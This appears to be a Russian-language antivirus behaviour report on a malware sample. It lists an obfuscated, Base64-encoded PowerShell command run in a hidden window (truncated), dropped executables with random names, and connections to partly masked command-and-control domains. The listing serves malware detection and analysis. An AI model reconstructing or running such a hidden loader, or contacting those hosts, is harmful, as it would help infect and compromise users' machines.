Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABUADMAaABmAHMAOAB5AD0AKAAoACcARwA2ACcAKwAnAHIAJwArACcAMQA0AG0AJwApACsAJwB3ACcAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAEUAbgBWADoAVQBzAEUAcgBwAHIATwBGAEkATABFAFwAbQAzAFkAZg...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1516
- %TEMP%\1183173.cvr
- %HOMEPATH%\m3yfa09\fedmqsu\k2ngq9rh.exe
- 're######ntprofessional.com':443
- 'ai###shirt.com':443
- 'ed###ug.store':443
- 're######ntprofessional.com':443
- 'ai###shirt.com':443
- 'ed###ug.store':443
- DNS ASK th###work.com
- DNS ASK re######ntprofessional.com
- DNS ASK wr#####fromling.live
- DNS ASK sh####tubuddin.org
- DNS ASK ju###tart.store
- DNS ASK ai###shirt.com
- DNS ASK ed###ug.store
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABUADMAaABmAHMAOAB5AD0AKAAoACcARwA2ACcAKwAnAHIAJwArACcAMQA0AG0AJwApACsAJwB3ACcAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAEUAbgBWADoAVQBzAEUAcgBwAHIATwBGAEkATABFAFwAbQAzAFkAZg...' (со скрытым окном)